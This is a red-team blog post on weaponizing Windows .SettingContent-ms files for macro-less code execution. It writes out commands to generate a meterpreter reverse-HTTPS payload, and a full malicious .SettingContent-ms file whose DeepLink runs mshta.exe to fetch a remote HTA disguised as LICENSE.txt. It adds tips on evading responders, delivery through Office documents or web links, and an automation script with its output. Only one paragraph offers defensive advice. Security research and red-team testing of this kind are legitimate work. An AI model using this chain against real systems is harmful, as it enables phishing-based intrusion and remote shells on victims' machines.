Weaponizing .SettingContent-ms Extensions for Code Execution

Matt Nelson (@engima0x3) from SpecterOps recently released a blog post on leveraging a newly discovered filetype extension with the possibility of command execution. This was a fantastic blog, and as attackers, we typically try to find multiple ways to execute code from different delivery systems. This blog is leveraging the awesome research from Matt and using it for code execution on a remote system.

Here are some of the key findings from Matt’s blog post:

  1. Microsoft acknowledged that they probably would not be fixing it.
  2. Works directly from a browser for execution.
  3. Can be embedded into Office documents and can be used for direct execution without Macros.
  4. Can be crafted in order to bypass Microsoft’s Attack Surface Reduction (ASR) using a whitelisted directory through Microsoft Office folders for spawning child processes within the Microsoft Office directory.

Many of these are promising because as attackers, we typically try to find new ways of compromising a system without the ability to use traditional methods (such as Macros, HTAs, etc.). Matt did a great job in researching and explaining how he went from Point A to Point Z to get to the place where he was able to circumvent ASR and get command execution.

On a recent engagement, the customer we were doing a red team engagement for had some solid detection capabilities, and this blog post was timely for us to use in the wild in a real-world simulation. With other traditional discoveries that go public such as DDE Auto in the past, attackers weaponize these techniques quickly (https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/). With DDE, we saw attack vectors within 24 hours. Instead of needing to burn zero-day techniques with our customers (responsible disclosure afterwards), using public techniques that get disclosed is often a good measure of how fast their teams can move to detection (or preventative capabilities).

I decided to take a look at the research and see if I could weaponize it quickly for an engagement. Matt went all the way up to the point of spawning calc.exe (commonly used to demonstrate command/code execution) but didn’t go as far as using this in a weaponized format. The first thing I decided to do was spin up Unicorn (github.com/trustedsec.com/unicorn) to see if I could get an obfuscated payload to run.

Using Unicorn, I generated a quick meterpreter shell to test and pasted it into Matt’s proof of concept, replacing the cmd.exe with powershell.exe:

git clone https://github.com/trustedsec/unicorn
cd unicorn
python unicorn.py windows/meterpreter/reverse_https 172.16.37.164 443

This will create an obfuscated PowerShell payload and export that as powershell_attacks.txt:

Figure 1 – Obfuscated PowerShell Code

When inserting the long PowerShell string into the .SettingContent-ms file and executing, it appears that the <DeepLink></DeepLink> field errors out:

Figure 2 – Erroring Out Due to Long String

After doing some investigation on the DeepLink field, I noticed that the max character size allowed (including path and everything) is 517 characters. While this is still a great size to play with for our payloads, this means that using large payloads would not be feasible from this attack vector.

There are a number of ways to gain code execution within 517 characters. In the next example, we’ll use a commonly attacked binary with web capabilities called “mshta.exe”. MSHTA is on every supported operating system from Microsoft and has built in ability to download and execute HTA files remotely from the command line. We could use a number of other methods such as the nps_payload (https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/) method, certutil (https://twitter.com/subtee/status/889173356284530688?lang=en), or other methods. HTAs are easy, and you do not need to specify an actual “hta” extension, as most of these extensions are typically blocked.

Let’s first create our payload with Unicorn, which supports HTAs, and see if we can get code execution.

First, we need to generate our malicious HTA, head to the unicorn directory and type:

python unicorn.py windows/meterpreter/reverse_https 172.16.37.164 443 hta
cp hta_attack/Launcher.hta /var/www/html/LICENSE.txt
service apache2 start

This will generate the appropriate HTA file once Unicorn has completed. Below is a screenshot of running Unicorn:

Figure 3 – Running Unicorn to Generate Our Payload

We then copy the HTA file over and rename it to LICENSE.txt. In most cases if a incident responder is looking at malicious files, an extension type of .txt or others may throw them off. In addition, if this were a real-world simulation, you would want to use HTTPS and use a legitimate and high reputation (and categorized) domain in order to throw off the blue team.

Lastly, we start Apache in order to host our malicious HTA.

Below is an example of the output from Unicorn of the malicious/obfuscated HTA:

Figure 4 – Output from Unicorn

Next, we create a Test.SettingContent-ms file with our URL to the malicious HTA (LICENSE.txt):

<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\mshta.exe http://172.16.37.164/LICENSE.txt</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
    <SettingInformation>
      <Description>@shell32.dll,-4161</Description>
      <Keywords>@shell32.dll,-4161</Keywords>
    </SettingInformation>
  </SearchableContent>
</PCSettings>

Once we save and double click the file, we now have a shell!

Figure 5 – Successful Shell Access from Meterpreter

Success! Obviously in this example we used Metasploit, but this will work for pretty much any payload you want. MSHTA is only one example of the ability to remotely download and well within the character size restriction of 517. In addition, you can easily embed these into office documents and ship them off, and as soon as they open, you gain the ability to compromise the computer. You can also host the extension type on a website and coax the user to click on a link. If you want to get crafty, changing things like the icon and others may help. Below is a simple site with a link to download and execute (just a normal href):

Figure 6 – Simple Site with Link

Important Download is the hosted SettingContent-ms file. Once opened, it will compromise the system in a similar fashion.

For defenders, the best and easiest course of action is to block .SettingContent-ms types from the perimeter (to block the web-based attacks), or establish an alert whenever one is downloaded or executed. Additionally, consider changing the file association types for .SettingContent-ms to notepad or something different that does not execute the code.

If you want a quick tool to automatically do this for you, I’ve written a quick tool called auto_settingcontent-ms.py which creates the Metasploit payload, HTA, and Test.SettingContent-ms file for you automatically. This assumes you have Metasploit, Python, and Apache installed already. Note that this is just an example, there are many other methods, this is just a quick POC.

To run, first git clone auto_settingcontent-ms first, then run it:

git clone https://github.com/trustedsec/auto_SettingContent-ms
cd auto_SettingContent-ms

Once we have the script, we’ll need to run it and generate our file.

root@stronghold:/home/relik/Desktop/git/auto_settingcontent-ms# python auto_settingcontent-ms.py

This is a simple script that will generate a .SettingContent-ms file which can be used for command/code execution on the system. This file can be hosted inside of an office document, or on a website for the victim to click and gain code execution. This is just a POC and used with Metasploit. You can use whatever you want as far as payload, in this example we are just using windows/meterpreter/reverse_https.

 

root@stronghold:/home/relik/Desktop/git/auto_settingcontent-ms# python auto_settingcontent-ms.py 
Credit to: Matt Nelson (@enigma0x3) from SpecterOps
Great read here: https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39
Written by: David Kennedy (@HackingDave, @TrustedSec)
 
Version 0.1
Enter the reverse shell IP address: 192.168.5.5
Enter the port for the reverse shell: 443
Cloning into 'unicorn'...
remote: Counting objects: 340, done.
remote: Total 340 (delta 0), reused 0 (delta 0), pack-reused 340
Receiving objects: 100% (340/340), 163.94 KiB | 0 bytes/s, done.
Resolving deltas: 100% (215/215), done.
Checking connectivity... done.
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
[*] Exported Test.SettingContent-ms to this folder. Moved over LICENSE.txt (malicious HTA) and setup the SettingContent-ms to point to the Apache server hosting this under /var/www/html
[*] To launch the Metasploit listener, run msfconsole -r unicorn.rc
root@stronghold:/home/relik/Desktop/git/auto_settingcontent-ms#

Download Auto_SettingContent-MS from GitHub

A special thanks to Matt Nelson over at SpecterOps for his great work and examples of gaining code execution abilities through a specific extension type.

References:

Original Post from Matt Nelson on .SettingContent-ms: https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39

David Kennedy

Author: David Kennedy

Security expert, keynote speaker, avid gamer and the go-to for protecting companies from threats.